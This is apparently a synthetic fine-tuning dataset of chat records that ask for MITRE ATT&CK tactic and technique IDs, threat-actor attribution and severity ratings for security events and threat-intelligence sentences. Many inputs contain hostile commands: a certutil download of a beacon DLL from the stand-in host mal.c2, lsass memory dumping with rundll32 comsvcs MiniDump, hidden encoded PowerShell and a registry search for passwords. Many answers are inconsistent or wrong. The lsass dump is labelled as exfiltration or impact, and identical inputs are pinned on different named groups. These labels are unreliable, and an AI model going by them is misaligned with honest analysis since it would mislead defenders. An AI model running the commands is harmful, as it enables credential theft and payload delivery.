messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.3.176.24", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.170.152.172", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3513 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.78.68.196", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0002\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1137 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.40.91.179", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\",...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.0.2.184", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.", "role": "user" }, { "content": "{\"tactics\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-4P25WTVXYT)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-JZFO98456N)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Lateral Movement, Privilege Escalation", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-L8XGXIHAO6)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Collection", "role": "user" }, { "content": "{\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: FIN8 has used emails with malicious links to lure victims into installing malware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", "role": "...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Some Volgmer variants use SSL to encrypt C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HAFNIUM has obtained IP addresses for publicly-accessible Exchange servers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1590\", \"T1590.005\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-RO2D3VLVZN)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: environmental keying", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1480\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-PL3ZYMV800)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\": \"E...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SILENTTRINITY has a keylogging capability.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-W791CTYPFF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-4H4LU2OHZM)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\": \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0009\"], \"techniques\": [\"T1564\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}", "role": "a...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2641 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.4.218.249", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKCU /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3272 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.10.233.208", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0040\"], \"technique...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CrackMapExec can collect DNS information from the targeted system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confide...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 769 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.139.146.252", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.101.199.115", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-6B14UN2AA1)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Impact, Collection", "role": "user" }, { "content":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-WG3W0FACRC)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Reconnaissance", "role": "user" }, { "content": "{\"se...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-Q8SZCQBQSM)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"T1036\"]}", "role": "assistan...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3247 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.152.120.28", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T10...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3557 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.177.40.231", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-I0WHFNDXRC)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-B01PQC9XAW)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Impact, Defense Evasion", "role": "user" }, ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Octopus has exfiltrated data to file sharing sites.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567.002\", \"T1567\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-TYD2QCBC6N)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.89.128.11", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0001\", \"TA0008\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3287 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.28.164.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0005\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2837 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.13.54.155", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.127.21.222", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RogueRobin uses regsvr32.exe to run a .sct file for execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.010\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3411 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.52.128.76", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\",...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3544 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.172.253.44", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0004\"],...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Fox Kitten has used a Twitter account to communicate with ransomware victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1585\", \"T1585.001\"]}", "role": "assistant" ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ChangeServiceConfigW", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1489\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-9YGG1HUXU2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Discovery, Initial Access, Exfiltration", "role": "user" },...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3111 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-18J5TMU6MJ)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Lateral Movement", "role": "user" }, { "content": "{\"s...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious detinations ( destinations attributed to phishing campaigns).", "r...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2868 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.72.39.209", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0009\"], \"techniques...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TeamTNT has also encoded files using Base64.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-HS8Y9ASGYN)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Lateral Movement, Credential Access", "role": "user" }, { "c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 720 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.16.119.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3719 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for network data for uncommon data flows (, a client sending significantly more data than it receives from a server).", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T11...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1967 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 532 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.181.90.120", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattere...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1559\", \"T1559.002\"]}", "role": "a...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1507 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.103.58.140", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-8KNOZNRFV4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion, Reconnaissance", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-NMP6973PIF)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Impact, Discovery", "role": "user" }, { "content": "{\"severi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: EvilGrab has the capability to capture video from a victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1125\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-28U0BBTUUS)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Discovery", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-SUT040NFF4)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Credential Access", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UFQE2XAGDL)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact, Reconnaissance", "role": "user" }, { "content": "{\"sev...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.160.250.162", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: 05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes", "role": "user" }, { "content": "{\"tactics\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-1AZU70SEO5)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.117.103.189", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may use the information from System Network Configuration Discovery during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3115 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.180.131.110", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1059....
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2855 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"con...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Mythic supports SSL encrypted C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.002\"]}", "role": "assistant" } ]